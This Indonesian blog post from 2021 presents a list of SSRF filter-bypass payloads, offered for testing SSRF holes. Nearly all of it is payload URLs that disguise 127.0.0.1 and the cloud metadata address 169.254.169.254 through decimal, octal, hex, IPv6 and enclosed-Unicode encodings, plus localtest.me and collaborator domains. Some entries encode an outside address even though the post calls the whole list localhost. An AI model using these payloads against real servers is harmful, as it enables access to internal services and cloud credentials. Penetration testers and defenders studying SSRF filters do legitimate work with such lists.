BLANTERWISDOM101

Localhost SSRF Bypass List

Senin, 11 Januari 2021
SSRF
Sumber: Netsparker


 Serangan Server-Side Request Forgery (SSRF) semakin banyak dilakukan karena kerentanan terhadap host situs banyak ditemukan dari mudah nya mendapatkan data dari respon situs terhadap serangan SSRF. Sebagai payload, kami memberikan beberapa daftar localhost untuk testing celah SSRF.

Bypass SSRF List Untuk Localhost

http://127.1/
http://0000::1:80/
http://[::]:80/
http://2130706433/
http://whitelisted@127.0.0.1
http://0x7f000001/
http://017700000001
http://0177.00.00.01
http://⑯⑨。②⑤④。⑯⑨。②⑤④/
http://⓪ⓧⓐ⑨。⓪ⓧⓕⓔ。⓪ⓧⓐ⑨。⓪ⓧⓕⓔ:80/
http://⓪ⓧⓐ⑨ⓕⓔⓐ⑨ⓕⓔ:80/
http://②⑧⑤②⓪③⑨①⑥⑥:80/
http://④②⑤。⑤①⓪。④②⑤。⑤①⓪:80/
http://⓪②⑤①。⓪③⑦⑥。⓪②⑤①。⓪③⑦⑥:80/
http://0xd8.0x3a.0xd6.0xe3
http://0xd83ad6e3
http://0xd8.0x3ad6e3
http://0xd8.0x3a.0xd6e3
http://0330.072.0326.0343
http://000330.0000072.0000326.00000343
http://033016553343
http://3627734755
http://%32%31%36%2e%35%38%2e%32%31%34%2e%32%32%37
http://216.0x3a.00000000326.0xe3
localtest.me
http://newyork.localtest.me
http://mysite.localtest.me
http://redirecttest.localtest.me
sub1.sub2.sub3.localtest.me
http://bugbounty.dod.network
http://spoofed.burpcollaborator.net


Share This :
Arya Kresna

Hanya seorang pelajar yang hobi nya membuat kode dan berharap karya nya bermanfaat bagi orang lain.

0 komentar

Berkomentar dengan bahasa yang baik dan benar sangat diperlukan